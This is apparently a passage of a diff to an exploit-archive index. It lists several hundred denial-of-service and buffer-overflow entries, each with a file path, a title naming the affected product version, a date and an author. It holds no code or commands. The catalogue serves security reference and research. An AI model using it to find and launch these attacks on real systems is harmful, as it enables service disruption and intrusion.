+23086,exploits/windows/dos/23086.txt,"Yahoo! Messenger 4.0/5.0 - Remote Denial of Service",2003-09-01,diman,dos,windows, +23087,exploits/hardware/dos/23087.c,"Check Point Firewall-1 4.x - SecuRemote Internal Interface Address Information Leakage",2001-07-17,"Jim Becher",dos,hardware, +23088,exploits/windows/dos/23088.pl,"ZoneAlarm 3.7.202/PRO 4.0/PRO 4.5 - Random UDP Flood Denial of Service (1)",2003-09-02,_6mO_HaCk,dos,windows, +23089,exploits/windows/dos/23089.c,"ZoneAlarm 3.7.202/PRO 4.0/PRO 4.5 - Random UDP Flood Denial of Service (2)",2003-09-02,WARL0RD,dos,windows, +23090,exploits/windows/dos/23090.asm,"ZoneAlarm 3.7.202/PRO 4.0/PRO 4.5 - Random UDP Flood Denial of Service (3)",2003-09-02,"Igor Franchuk",dos,windows, +23101,exploits/windows/dos/23101.c,"Microsoft Windows 98 - Fragmented UDP Flood Denial of Service",2003-09-04,WARL0RD,dos,windows, +23102,exploits/windows/dos/23102.pl,"FoxWeb 2.5 - PATH_INFO Remote Buffer Overrun",2003-06-27,pokleyzz,dos,windows, +23107,exploits/windows/dos/23107.txt,"Opera Web Browser 12.11 - Crash (PoC)",2012-12-03,coolkaveh,dos,windows, +23112,exploits/linux/dos/23112.txt,"IBM DB2 db2dart - Buffer Overflow",2003-09-18,"Martinez Kuhn",dos,linux, +23116,exploits/linux/dos/23116.pl,"Mah-Jong 1.4/1.6 - Server Remote Denial of Service",2003-09-07,jsk,dos,linux, +23117,exploits/windows/dos/23117.txt,"FTP Desktop 3.5 - Banner Parsing Buffer Overflow",2003-09-08,"Bahaa Naamneh",dos,windows, +23118,exploits/windows/dos/23118.txt,"FTP Desktop 3.5 - FTP 331 Server Response Buffer Overflow",2003-09-08,"Bahaa Naamneh",dos,windows, +23124,exploits/windows/dos/23124.txt,"NullSoft Winamp 2.81/2.91/3.0/3.1 - MIDI Plugin 'IN_MIDI.dll' Track Data Size Buffer Overflow",2003-09-08,"Luigi Auriemma",dos,windows, +23130,exploits/windows/dos/23130.txt,"Gordano Messaging Suite 9.0 - 'WWW.exe' Denial of Service",2003-09-10,"Phuong Nguyen",dos,windows, +23138,exploits/linux/dos/23138.txt,"MySQL 3.23.x/4.0.x - Password Handler Buffer Overflow",2003-09-10,"Frank DENIS",dos,linux, +23139,exploits/windows/dos/23139.txt,"myServer 0.4.x - 'cgi-lib.dll' Remote Buffer Overflow",2003-09-12,Moran,dos,windows, +23142,exploits/multiple/dos/23142.txt,"WideChapter 3.0 - HTTP Request Buffer Overflow",2003-09-15,"Bahaa Naamneh",dos,multiple, +23145,exploits/windows/dos/23145.c,"Ipswitch Imail Server 5.0 - SMTP HELO Argument Buffer Overflow",1998-03-10,Rootshell,dos,windows, +23146,exploits/windows/dos/23146.c,"Alt-N MDaemon Server 2.71 SP1 - SMTP HELO Argument Buffer Overflow",1999-03-10,Rootshell,dos,windows, +23150,exploits/windows/dos/23150.c,"ChatZilla 0.8.23 - Remote Denial of Service",2003-09-15,D4rkGr3y,dos,windows, +23165,exploits/windows/dos/23165.txt,"Sun Java 1.x - XML Document Nested Entity Denial of Service",2003-09-22,"Sun Microsystems",dos,windows, +23166,exploits/windows/dos/23166.pl,"Plug And Play Web Server 1.0 002c - FTP Service Command Handler Buffer Overflow",2003-09-21,"Bahaa Naamneh",dos,windows, +23167,exploits/irix/dos/23167.c,"Sendmail 8.9.2 - Headers Prescan Denial of Service",1998-12-12,marchew,dos,irix, +23169,exploits/windows/dos/23169.pl,"WzdFTPD 0.1 rc5 - Login Remote Denial of Service",2003-09-23,"Moran Zavdi",dos,windows, +23170,exploits/linux/dos/23170.c,"ProFTPd 1.2.7/1.2.8 - '.ASCII' File Transfer Buffer Overrun",2003-09-23,netris,dos,linux, +23172,exploits/linux/dos/23172.txt,"Gauntlet Firewall for Unix 6.0 - SQL-GW Connection Denial of Service",2003-09-24,"Oliver Heinz & Thomas Neuderth",dos,linux, +23177,exploits/windows/dos/23177.txt,"Nvidia Install Application 2.1002.85.551 - 'NVI2.dll' Unicode Buffer Overflow (PoC)",2012-12-06,LiquidWorm,dos,windows, +23181,exploits/multiple/dos/23181.txt,"NullLogic Null HTTPd 0.5 - Remote Denial of Service",2003-09-24,"Luigi Auriemma",dos,multiple, +23190,exploits/hardware/dos/23190.pl,"SMC Router 1.2x - Random UDP Packet Denial of Service",2003-09-26,_6mO_HaCk,dos,hardware, +23191,exploits/windows/dos/23191.txt,"Savant Web Server 3.1 - Page Redirect Denial of Service",2003-09-26,"Phuong Nguyen",dos,windows, +23200,exploits/linux/dos/23200.txt,"Gamespy 3d 2.62/2.63 - IRC Client Remote Buffer Overflow",2003-09-30,"Luigi Auriemma",dos,linux, +23201,exploits/windows/dos/23201.txt,"VideoLAN VLC Media Player 2.0.4 - '.swf' Crash (PoC)",2012-12-07,coolkaveh,dos,windows, +23215,exploits/windows/dos/23215.html,"Microsoft Internet Explorer 6 - Absolute Position Block Denial of Service",2003-10-03,"Nick Johnson",dos,windows, +23216,exploits/windows/dos/23216.txt,"Microsoft Word 97/98/2002 - Malformed Document Denial of Service",2003-10-03,"Bahaa Naamneh",dos,windows, +23231,exploits/multiple/dos/23231.txt,"Medieval Total War 1.0/1.1 - nickname Denial of Service",2003-10-07,"Luigi Auriemma",dos,multiple, +23234,exploits/windows/dos/23234.c,"Centrinity FirstClass HTTP Server 5.50/5.77/7.0/7.1 - Long Version Field Denial of Service",2003-10-08,I2S-LaB,dos,windows, +23235,exploits/windows/dos/23235.txt,"OpenOffice 1.0.1 - Remote Access Denial of Service",2003-10-08,"Marc Schoenefeld",dos,windows, +23236,exploits/hp-ux/dos/23236.txt,"HP-UX 11 CDE DTPrintInfo - Display Environment Variable Buffer Overflow",2003-10-08,"Davide Del Vecchio",dos,hp-ux, +23239,exploits/linux/dos/23239.c,"IRCnet IRCD 2.10 - Local Buffer Overflow",2003-10-13,millhouse,dos,linux, +23240,exploits/windows/dos/23240.pl,"mIRC 6.1 - 'DCC SEND' Buffer Overflow (1)",2003-10-13,"Takara Takaishi",dos,windows, +23241,exploits/windows/dos/23241.pl,"mIRC 6.1 - 'DCC SEND' Buffer Overflow (2)",2003-10-13,DarkAngel,dos,windows, +23242,exploits/windows/dos/23242.pl,"WinSyslog Interactive Syslog Server 4.21 - long Message Remote Denial of Service",2003-10-14,storm@securiteam.com,dos,windows, +23245,exploits/linux/dos/23245.pl,"Apache Tomcat 4.0.x - Non-HTTP Request Denial of Service",2003-10-15,"Oliver Karow",dos,linux, +23246,exploits/windows/dos/23246.txt,"SumatraPDF 2.1.1/MuPDF 1.0 - Integer Overflow",2012-12-09,beford,dos,windows, +23248,exploits/android/dos/23248.txt,"Google Android Kernel 2.6 - Local Denial of Service Crash (PoC)",2012-12-09,G13,dos,android, +23254,exploits/windows/dos/23254.txt,"TVMOBiLi 2.1.0.3557 - Denial of Service",2012-12-09,"High-Tech Bridge SA",dos,windows, +23263,exploits/multiple/dos/23263.txt,"Opera 7.11/7.20 HREF - Malformed Server Name Heap Corruption",2003-10-20,@stake,dos,multiple, +23267,exploits/windows/dos/23267.txt,"Atrium Software Mercur MailServer 3.3/4.0/4.2 - IMAP AUTH Remote Buffer Overflow",2003-10-20,"Kostya KORTCHINSKY",dos,windows, +23273,exploits/windows/dos/23273.html,"Microsoft Internet Explorer 6 - Scrollbar-Base-Color Partial Denial of Service",2003-10-22,"Andreas Boeckler",dos,windows, +23274,exploits/linux/dos/23274.pl,"Coreutils 4.5.x - LS Width Argument Integer Overflow",2003-10-22,druid,dos,linux, +23276,exploits/multiple/dos/23276.java,"Sun Java Virtual Machine 1.x - Slash Path Security Model Circumvention",2003-10-22,"Last Stage of Delirium",dos,multiple, +23388,exploits/windows/dos/23388.txt,"Valve Software Half-Life Dedicated Server 3.1/4.1 - Information Disclosure/Denial of Service",2003-11-19,3APA3A,dos,windows, +23389,exploits/openbsd/dos/23389.c,"OpenBSD 3.3/3.4 - 'sysctl' Local Denial of Service",2003-11-19,anonymous,dos,openbsd, +23279,exploits/windows/dos/23279.txt,"DIMIN Viewer 5.4.0 - Crash (PoC)",2012-12-10,"Jean Pascal Pereira",dos,windows, +23280,exploits/windows/dos/23280.txt,"FreeVimager 4.1.0 - Crash (PoC)",2012-12-10,"Jean Pascal Pereira",dos,windows, +23314,exploits/multiple/dos/23314.c,"Serious Sam Engine 1.0.5 - Remote Denial of Service",2003-10-30,"Luigi Auriemma",dos,multiple, +23288,exploits/windows/dos/23288.txt,"IrfanView 4.33 - 'IMXCF.dll' Plugin Code Execution",2012-12-11,beford,dos,windows, +23292,exploits/multiple/dos/23292.java,"Sun Microsystems Java Virtual Machine 1.x - Security Manager Denial of Service",2003-10-26,"Marc Schoenefeld",dos,multiple, +23293,exploits/windows/dos/23293.txt,"Yahoo! Messenger 5.6 - File Transfer Buffer Overrun",2003-10-27,"Hat-Squad Security Team",dos,windows, +23305,exploits/linux/dos/23305.c,"thttpd 2.2x - 'defang' Remote Buffer Overflow (PoC)",2003-10-27,"Joel Soderberg",dos,linux, +23310,exploits/windows/dos/23310.pl,"TelCondex SimpleWebserver 2.12.30210 build 3285 - HTTP Referer Remote Buffer Overflow",2003-10-29,"Oliver Karow",dos,windows, +23311,exploits/php/dos/23311.txt,"E107 - 'Chatbox.php' Denial of Service",2003-10-29,Blademaster,dos,php, +23325,exploits/multiple/dos/23325.c,"BRS Webweaver 1.06 - HTTPd 'User-Agent' Remote Denial of Service",2003-11-01,D4rkGr3y,dos,multiple, +23337,exploits/windows/dos/23337.c,"Avaya Argent Office - DNS Packet Denial of Service",2001-08-07,"Jacek Lipkowski",dos,windows, +23339,exploits/openbsd/dos/23339.c,"OpenBSD 2.x/3.x - Local Malformed Binary Execution Denial of Service",2003-11-04,"Georgi Guninski",dos,openbsd, +23347,exploits/linux/dos/23347.txt,"IBM DB2 - 'db2start' Command Line Argument Local Overflow",2003-11-07,SNOSoft,dos,linux, +23348,exploits/linux/dos/23348.txt,"IBM DB2 - 'db2stop' Command Line Argument Local Overflow",2003-11-07,SNOSoft,dos,linux, +23349,exploits/linux/dos/23349.txt,"IBM DB2 - 'db2govd' Command Line Argument Local Overflow",2003-11-07,SNOSoft,dos,linux, +23361,exploits/hardware/dos/23361.txt,"Cisco Wireless Lan Controller 7.2.110.0 - Multiple Vulnerabilities",2012-12-13,"Jacob Holcomb",dos,hardware, +23374,exploits/windows/dos/23374.pl,"Qualcomm Eudora 5.x/6.0 - Spoofed Attachment Line Denial of Service",2003-11-12,"Paul Szabo",dos,windows, +23375,exploits/linux/dos/23375.txt,"GNU Zebra 0.9x / Quagga 0.96 - Remote Denial of Service",2003-11-12,"Jonny Robertson",dos,linux, +23390,exploits/multiple/dos/23390.txt,"EffectOffice Server 2.6 - Remote Service Buffer Overflow",2003-11-20,D_BuG,dos,multiple, +23391,exploits/linux/dos/23391.txt,"FreeRadius 0.x/1.1.x - Tag Field Heap Corruption",2003-11-20,"Evgeny Legerov",dos,linux, +23392,exploits/openbsd/dos/23392.c,"OpenBSD 3.3/3.4 - semctl/semop Local Unexpected Array Indexing",2003-11-21,anonymous,dos,openbsd, +43151,exploits/windows/dos/43151.html,"Microsoft Edge - 'Object.setPrototypeOf' Memory Corruption",2017-11-16,"Google Security Research",dos,windows, +23393,exploits/linux/dos/23393.c,"GEdit 2.0/2.2 - Large IOStream File Memory Corruption",2003-11-23,MegaHz,dos,linux, +23394,exploits/hardware/dos/23394.c,"Thomson Cablemodem TCM315 - Denial of Service",2003-11-24,"Shell security group",dos,hardware, +23412,exploits/windows/dos/23412.pl,"EZPhotoShare 1.0/1.1 - Memory Corruption",2003-12-03,Winter-Smith,dos,windows, +23452,exploits/linux/dos/23452.txt,"Tcpdump 3.x - L2TP Parser Remote Denial of Service",2003-12-20,"Przemyslaw Frasunek",dos,linux, +23427,exploits/linux/dos/23427.txt,"Totem Movie Player 3.4.3 (Ubuntu) - Stack Corruption",2012-12-16,coolkaveh,dos,linux, +23431,exploits/multiple/dos/23431.pl,"SX Design sipd 0.1.2 - Remote Denial of Service",2003-12-11,storm,dos,multiple, +23438,exploits/linux/dos/23438.pl,"X-Chat 2.0.6 - Remote Denial of Service",2003-12-15,"Stefan Hecker",dos,linux, +23442,exploits/osx/dos/23442.txt,"Apple Mac OSX 10 - CD9660.Util Probe For Mounting Argument Local Buffer Overflow",2003-12-15,Max,dos,osx, +23444,exploits/multiple/dos/23444.pl,"SX Design sipd 0.1.2/0.1.4 - Remote Format String",2003-12-16,storm,dos,multiple, +23460,exploits/php/dos/23460.pl,"ProjectForum 8.4.2.1 - Find Request Denial of Service",2003-12-22,"Peter Winter-Smith",dos,php, +23468,exploits/windows/dos/23468.pl,"Xlight FTP Server 1.25/1.41 - PASS Command Remote Buffer Overflow",2003-12-23,storm,dos,windows, +23469,exploits/windows/dos/23469.txt,"Adobe Flash Player 11.5.502.135 - Crash (PoC)",2012-12-18,coolkaveh,dos,windows, +23480,exploits/windows/dos/23480.txt,"Surfboard HTTPd 1.1.9 - Remote Buffer Overflow",2003-12-26,"decka trash",dos,windows, +23496,exploits/windows/dos/23496.txt,"DIMIN Viewer 5.4.0 - GIF Decode Crash (PoC)",2012-12-19,"Lizhi Wang",dos,windows, +23693,exploits/windows/dos/23693.txt,"Sami FTP Server 1.1.3 - Library Crafted GET Remote Denial of Service",2004-02-13,"intuit e.b.",dos,windows, +23501,exploits/windows/dos/23501.c,"Alt-N MDaemon 6.x/WorldClient - Form2Raw Raw Message Handler Buffer Overflow (1)",2003-12-29,"Behrang Fouladi",dos,windows, +23504,exploits/windows/dos/23504.txt,"Microsoft Windows XP/2000 - showHelp '.CHM' File Execution (MS03-004)",2003-12-30,"Arman Nayyeri",dos,windows, +23505,exploits/osx/dos/23505.c,"Apple Mac OSX 10.x - SecurityServer Daemon Local Denial of Service",2003-12-30,"Matt Burnett",dos,osx, +23506,exploits/windows/dos/23506.txt,"GoodTech Telnet Server 4.0 - Remote Denial of Service",2004-01-02,"Donato Ferrante",dos,windows, +23508,exploits/hardware/dos/23508.txt,"YaSoft Switch Off 2.3 - Large Packet Remote Denial of Service",2004-01-02,"Peter Winter-Smith",dos,hardware, +23512,exploits/windows/dos/23512.txt,"Surfnet 1.31 - CMD_CREDITCARD_CHARGE Denial of Service",2004-01-02,Rift_XT,dos,windows, +23692,exploits/windows/dos/23692.txt,"Sami FTP Server 1.1.3 - Invalid Command Argument Local Denial of Service",2004-02-13,"intuit e.b.",dos,windows, +23523,exploits/linux/dos/23523.c,"gdb (GNU debugger) 7.5.1 - Null Pointer Dereference",2012-12-20,nitr0us,dos,linux, +23524,exploits/multiple/dos/23524.c,"IDA Pro 6.3 - Crash (PoC)",2012-12-20,nitr0us,dos,multiple, +23530,exploits/windows/dos/23530.c,"Kroum Grigorov KpyM Telnet Server 1.0 - Remote Denial of Service",2004-01-07,NoRpiuS,dos,windows, +23534,exploits/windows/dos/23534.txt,"Hand-Crafted Software FreeProxy 3.5/3.6 - FreeWeb CreateFile Function Denial of Service",2004-01-09,badpack3t,dos,windows, +23538,exploits/windows/dos/23538.txt,"LionMax Software WWW File Share Pro 2.4/2.6 - Remote Denial of Service",2004-01-12,dr_insane,dos,windows, +23539,exploits/linux/dos/23539.txt,"Mabry Software FTPServer/X 1.0 - Controls Format String",2004-01-12,"Jan-Olivier Fillols",dos,linux, +23540,exploits/freebsd/dos/23540.c,"KAME Racoon - 'Initial Contact' SA Deletion",2004-01-14,"Thomas Walpuski",dos,freebsd, +23543,exploits/multiple/dos/23543.txt,"Vicomsoft RapidCache Server 2.0/2.2.6 - Host Argument Denial of Service",2004-01-15,"Peter Winter-Smith",dos,multiple, +23556,exploits/multiple/dos/23556.txt,"GetWare Web Server Component - Content-Length Value Remote Denial of Service",2004-01-19,"Luigi Auriemma",dos,multiple, +23565,exploits/windows/dos/23565.txt,"Sony PC Companion 2.1 - 'DownloadURLToFile()' Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,dos,windows, +23567,exploits/windows/dos/23567.txt,"Sony PC Companion 2.1 - 'Load()' Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,dos,windows, +23568,exploits/windows/dos/23568.txt,"Sony PC Companion 2.1 - 'CheckCompatibility()' Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,dos,windows, +23569,exploits/windows/dos/23569.txt,"Sony PC Companion 2.1 - 'Admin_RemoveDirectory()' Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,dos,windows, +23574,exploits/windows/dos/23574.txt,"FireFly Mediaserver 1.0.0.1359 - Null Pointer Dereference",2012-12-21,"High-Tech Bridge SA",dos,windows, +23584,exploits/windows/dos/23584.c,"McAfee ePolicy Orchestrator 1.x/2.x/3.0 Agent - POST Buffer Mismanagement",2004-01-22,cyber_flash,dos,windows, +23590,exploits/multiple/dos/23590.txt,"Reptile Web Server Reptile Web Server 20020105 - Denial of Service",2004-01-23,"Donato Ferrante",dos,multiple, +23595,exploits/windows/dos/23595.txt,"TinyServer 1.1 - Denial of Service",2004-01-24,"Donato Ferrante",dos,windows, +23602,exploits/windows/dos/23602.txt,"mIRC 6.1 - DCC Get Dialog Denial of Service",2004-01-26,"MASTER VIPER",dos,windows, +23614,exploits/windows/dos/23614.txt,"Loom Software SurfNow 1.x/2.x - GET Remote Denial of Service",2004-01-28,"Donato Ferrante",dos,windows, +23686,exploits/windows/dos/23686.txt,"Monkey HTTP Daemon 0.x - Missing Host Field Denial of Service",2004-02-11,"Luigi Auriemma",dos,windows, +23689,exploits/windows/dos/23689.c,"Crob FTP Server 3.5.2 - Remote Denial of Service",2004-02-12,gsicht,dos,windows, +23690,exploits/linux/dos/23690.txt,"XFree86 4.x - CopyISOLatin1Lowered Font_Name Buffer Overflow",2004-02-12,"Greg MacManus",dos,linux, +23633,exploits/windows/dos/23633.txt,"Crob FTP Server 3.5.1 - Denial of Service",2004-02-02,"Zero X",dos,windows, +23638,exploits/hardware/dos/23638.pl,"Cisco IOS 12 MSFC2 - Layer 2 Frame Denial of Service",2004-02-03,blackangels,dos,hardware, +23641,exploits/multiple/dos/23641.txt,"Cauldron Chaser 1.4/1.5 - Remote Denial of Service (1)",2004-02-03,"Luigi Auriemma",dos,multiple, +23642,exploits/multiple/dos/23642.txt,"Cauldron Chaser 1.4/1.5 - Remote Denial of Service (2)",2004-02-03,"Luigi Auriemma",dos,multiple, +23648,exploits/windows/dos/23648.pl,"Web Crossing Web Server 4.0/5.0 Component - Remote Denial of Service",2004-02-04,"Peter Winter-Smith",dos,windows, +23654,exploits/windows/dos/23654.txt,"Xlight FTP Server 1.x - Long Directory Request Remote Denial of Service",2004-02-05,intuit,dos,windows, +23656,exploits/multiple/dos/23656.txt,"Oracle 9.x - 'Database' / Statement Buffer Overflow",2003-02-05,NGSSoftware,dos,multiple, +23660,exploits/windows/dos/23660.c,"BolinTech DreamFTP Server 1.0 - User Name Format String",2004-02-07,shaun2k2,dos,windows, +23662,exploits/linux/dos/23662.c,"Nadeo Game Engine - Remote Denial of Service",2004-02-09,scrap,dos,linux, +23664,exploits/windows/dos/23664.py,"Sambar Server 6.0 - 'results.stm' POST Buffer Overflow",2004-02-09,nd@felinemenace.org,dos,windows, +23665,exploits/windows/dos/23665.c,"Shaun2k2 Palmhttpd Server 3.0 - Remote Denial of Service",2004-02-09,shaun2k2,dos,windows, +23667,exploits/linux/dos/23667.txt,"ClamAV Daemon 0.65 - UUEncoded Message Denial of Service",2004-02-09,"Oliver Eikemeier",dos,linux, +23672,exploits/hardware/dos/23672.txt,"Red-M Red-Alert 3.1 - Remote Denial of Service",2004-02-09,"Bruno Morisson",dos,hardware, +23681,exploits/windows/dos/23681.pl,"EvolutionX - Multiple Remote Buffer Overflow Vulnerabilities",2004-02-10,Moth7,dos,windows, +23700,exploits/windows/dos/23700.txt,"ACLogic CesarFTP 0.99 - Remote Resource Exhaustion (Denial of Service)",2004-02-16,"intuit e.b.",dos,windows, +23701,exploits/windows/dos/23701.txt,"Xlight FTP Server 1.52 - Remote Send File Request Denial of Service",2004-02-16,"intuit e.b.",dos,windows, +23708,exploits/windows/dos/23708.c,"RobotFTP Server 1.0/2.0 - 'Username' Buffer Overflow (1)",2004-02-16,gsicht,dos,windows, +23709,exploits/windows/dos/23709.c,"RobotFTP Server 1.0/2.0 - 'Username' Buffer Overflow (2)",2004-02-16,NoRpiuS,dos,windows, +23713,exploits/windows/dos/23713.txt,"Vizer Web Server 1.9.1 - Remote Denial of Service",2004-02-17,"Donato Ferrante",dos,windows, +23715,exploits/windows/dos/23715.pl,"TransSoft Broker FTP Server 6.1 - Denial of Service",2004-02-17,SecuriTeam,dos,windows, +23716,exploits/windows/dos/23716.txt,"SmallFTPd 1.0.3 - Remote Denial of Service",2004-02-17,"intuit e.b.",dos,windows, +23731,exploits/windows/dos/23731.txt,"TYPSoft FTP Server 1.1 - Remote CPU Consumption (Denial of Service)",2004-02-20,"intuit bug_hunter",dos,windows, +23750,exploits/php/dos/23750.txt,"RobotFTP Server 1.0/2.0 - Unauthenticated Remote Command Denial of Service",2004-02-24,"Zone-h Security Team",dos,php, +23752,exploits/windows/dos/23752.c,"Digital Reality Game Engine 1.0.x - Remote Denial of Service",2004-02-24,"Luigi Auriemma",dos,windows, +23755,exploits/multiple/dos/23755.txt,"RedStorm Ghost Recon Game Engine - Remote Denial of Service",2004-02-24,"Luigi Auriemma",dos,multiple, +23757,exploits/linux/dos/23757.txt,"Gamespy Software Development Kit - Remote Denial of Service",2004-02-24,"Luigi Auriemma",dos,linux, +23760,exploits/windows/dos/23760.pl,"RhinoSoft Serv-U FTPd Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (1)",2004-02-26,saintjmf,dos,windows, +23761,exploits/windows/dos/23761.c,"RhinoSoft Serv-U FTPd Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (2)",2004-02-26,shaun2k2,dos,windows, +23762,exploits/windows/dos/23762.c,"RhinoSoft Serv-U FTPd Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (3)",2004-02-26,shaun2k2,dos,windows, +23769,exploits/windows/dos/23769.pl,"ArGoSoft FTP Server 1.0/1.2/1.4 - Multiple Vulnerabilities",2004-02-27,"Beyond Security",dos,windows, +23778,exploits/hardware/dos/23778.c,"Motorola T720 Phone - Denial of Service",2004-03-01,"Shaun Colley",dos,hardware, +23779,exploits/linux/dos/23779.txt,"Grep < 2.11 - Integer Overflow Crash (PoC)",2012-12-31,"Joshua Rogers",dos,linux, +23780,exploits/windows/dos/23780.py,"Aktiv Player 2.80 - Crash (PoC)",2012-12-31,IndonesiaGokilTeam,dos,windows, +23786,exploits/hardware/dos/23786.c,"Nortel Wireless LAN Access Point 2200 Series - Denial of Service",2004-03-02,"Alex Hernandez",dos,hardware, +23787,exploits/multiple/dos/23787.txt,"1st Class Internet Solutions 1st Class Mail Server 4.0 - Remote Buffer Overflow",2004-03-02,JeFFOsZ,dos,multiple, +23788,exploits/hardware/dos/23788.pl,"SureCom EP-9510AX/EP-4504AX Network Device - Malformed Web Authorisation Request Denial of Service (1)",2004-03-02,"Vasco Costa",dos,hardware, +23789,exploits/hardware/dos/23789.c,"SureCom EP-9510AX/EP-4504AX Network Device - Malformed Web Authorisation Request Denial of Service (2)",2004-03-02,shaun2k2,dos,hardware, +23793,exploits/osx/dos/23793.txt,"Apple Safari 1.x - Large JavaScript Array Handling Denial of Service",2004-03-06,kang,dos,osx, +23799,exploits/multiple/dos/23799.txt,"Epic Games Unreal Tournament Server 436.0 - Engine Remote Format String",2004-03-10,"Luigi Auriemma",dos,multiple, +23805,exploits/multiple/dos/23805.txt,"Targem Games Battle Mages 1.0 - Remote Denial of Service",2004-03-11,"Luigi Auriemma",dos,multiple, +23830,exploits/linux/dos/23830.py,"Astium VoIP PBX 2.1 build 25399 - Remote Crash (PoC)",2013-01-02,xistence,dos,linux,5655 +23902,exploits/multiple/dos/23902.txt,"Roger Wilco Server 1.4.1 - UDP Datagram Handling Denial of Service",2004-03-31,"Luigi Auriemma",dos,multiple, +23839,exploits/windows/dos/23839.pl,"GlobalScape Secure FTP Server 2.0 Build 03.11.2004.2 - Site Command Remote Buffer Overflow",2004-03-17,storm,dos,windows, +23842,exploits/windows/dos/23842.pl,"WFTPD Server GUI 3.21 - Remote Denial of Service",2004-03-17,"Beyond Security",dos,windows, +23846,exploits/windows/dos/23846.txt,"Symantec Client Firewall Products 5 - 'SYMNDIS.SYS' Driver Remote Denial of Service",2004-03-18,"eEye Digital Security Team",dos,windows, +23850,exploits/windows/dos/23850.txt,"Microsoft Windows XP - 'explorer.exe' Remote Denial of Service",2004-03-19,"Rafel Ivgi The-Insider",dos,windows, +23876,exploits/hardware/dos/23876.txt,"PicoPhone Internet Phone 1.63 - Remote Buffer Overflow",2004-03-24,"Luigi Auriemma",dos,hardware, +23884,exploits/linux/dos/23884.txt,"NSTX 1.0/1.1 - Remote Denial of Service",2004-03-26,"laurent oudot",dos,linux, +23896,exploits/linux/dos/23896.txt,"MPlayer 0.9/1.0 - Remote HTTP Header Buffer Overflow",2004-03-30,blexim,dos,linux, +23900,exploits/hardware/dos/23900.txt,"CDP 0.33/0.4 - Console CD Player PrintTOC Function Buffer Overflow",2004-03-31,"Shaun Colley",dos,hardware, +23904,exploits/multiple/dos/23904.txt,"Roger Wilco Server 1.4.1 - Unauthorized Audio Stream Denial of Service",2004-03-31,"Luigi Auriemma",dos,multiple, +23911,exploits/windows/dos/23911.txt,"Microsoft Internet Explorer 6 - MSWebDVD Object Denial of Service",2004-04-06,"Rafel Ivgi The-Insider",dos,windows, +23912,exploits/windows/dos/23912.txt,"Microsoft Internet Explorer 6.0 Macromedia Flash Player Plugin - Remote Denial of Service",2004-04-06,"Rafel Ivgi The-Insider",dos,windows, +23915,exploits/windows/dos/23915.txt,"Adobe Photoshop 8.0 - COM Objects Denial of Service",2004-04-06,"Rafel Ivgi The-Insider",dos,windows, +23916,exploits/windows/dos/23916.txt,"Blaxxun Contact 3D - X-CC3D Browser Object Buffer Overflow",2004-04-06,"Rafel Ivgi The-Insider",dos,windows, +23917,exploits/windows/dos/23917.txt,"Panda ActiveScan 5.0 - 'ascontrol.dll' Remote Heap Overflow",2004-04-06,"Rafel Ivgi The-Insider",dos,windows, +23918,exploits/windows/dos/23918.txt,"Panda ActiveScan 5.0 - 'ascontrol.dll' Denial of Service",2004-04-06,"Rafel Ivgi The-Insider",dos,windows, +23919,exploits/windows/dos/23919.txt,"Symantec Security Check Virus Detection - COM Object Denial of Service",2004-04-07,"Rafel Ivgi The-Insider",dos,windows, +23920,exploits/windows/dos/23920.txt,"Mcafee FreeScan CoMcFreeScan Browser - Object Buffer Overflow",2004-04-07,"Rafel Ivgi The-Insider",dos,windows, +23923,exploits/windows/dos/23923.py,"FoxPlayer 2.9.0 - Denial of Service",2013-01-06,metacom,dos,windows, +23925,exploits/windows/dos/23925.txt,"Kerio Personal Firewall 4.0.x - Web Filtering Remote Denial of Service",2004-04-07,E.Kellinis,dos,windows, +23927,exploits/windows/dos/23927.txt,"Opera Web Browser 7.0 - Remote IFRAME Denial of Service",2004-04-08,"Pascal Notz",dos,windows, +23943,exploits/linux/dos/23943.txt,"Crackalaka IRC Server 1.0.8 - Remote Denial of Service",2004-04-09,"Donato Ferrante",dos,linux, +23944,exploits/windows/dos/23944.php,"Foxit Reader 5.4.4.1128 Firefox Plugin - 'npFoxitReaderPlugin.dll' Stack Buffer Overflow",2013-01-07,rgod,dos,windows, +23945,exploits/unix/dos/23945.txt,"Ettercap 0.7.5.1 - Stack Overflow",2013-01-07,"Sajjad Pourali",dos,unix, +23946,exploits/linux/dos/23946.c,"Linux Kernel 2.4/2.6 - Sigqueue Blocking Denial of Service",2004-04-12,"Nikita V. Youshchenko",dos,linux, +23999,exploits/linux/dos/23999.txt,"Neon WebDAV Client Library 0.2x - Format String",2004-04-14,"Thomas Wana",dos,linux, +24000,exploits/windows/dos/24000.pl,"Qualcomm Eudora 6.0.3 - MIME Message Nesting Denial of Service",2004-04-14,"Paul Szabo",dos,windows, +24002,exploits/windows/dos/24002.py,"Microsoft Outlook Express 6.0 - Remote Denial of Service",2004-04-14,"Ben Rampling",dos,windows, +24010,exploits/windows/dos/24010.txt,"Real Networks Helix Universal Server 9.0.x - Denial of Service",2004-04-15,anonymous,dos,windows, +24011,exploits/multiple/dos/24011.pl,"KPhone 2.x/3.x/4.0.1 - Malformed STUN Packet Denial of Service",2004-04-08,storm,dos,multiple, +24013,exploits/multiple/dos/24013.txt,"Macromedia ColdFusion MX 6.0 - Oversized Error Message Denial of Service",2004-04-17,"K. K. Mookhey",dos,multiple, +24022,exploits/windows/dos/24022.txt,"Nero MediaHome 4.5.8.0 - Denial of Service",2013-01-10,"High-Tech Bridge SA",dos,windows, +24023,exploits/hardware/dos/24023.py,"Colloquy 1.3.5/1.3.6 - Denial of Service",2013-01-10,UberLame,dos,hardware, +24029,exploits/windows/dos/24029.pl,"RhinoSoft Serv-U FTP Server 3.x/4.x/5.0 - 'LIST' Buffer Overflow",2004-04-20,storm,dos,windows, +24042,exploits/windows/dos/24042.txt,"Yahoo! Messenger 5.6 - 'YInsthelper.dll' Multiple Buffer Overflow Vulnerabilities",2004-04-23,"Rafel Ivgi The-Insider",dos,windows, +24051,exploits/windows/dos/24051.txt,"Microsoft Windows XP/2000/NT 4.0 - Shell Long Share Name Buffer Overrun",2004-04-25,"Rodrigo Gutierrez",dos,windows, +24066,exploits/multiple/dos/24066.txt,"DiGi WWW Server 1 - Remote Denial of Service",2004-04-27,"Donato Ferrante",dos,multiple, +24070,exploits/multiple/dos/24070.txt,"Rosiello Security Sphiro HTTPD 0.1B - Remote Heap Buffer 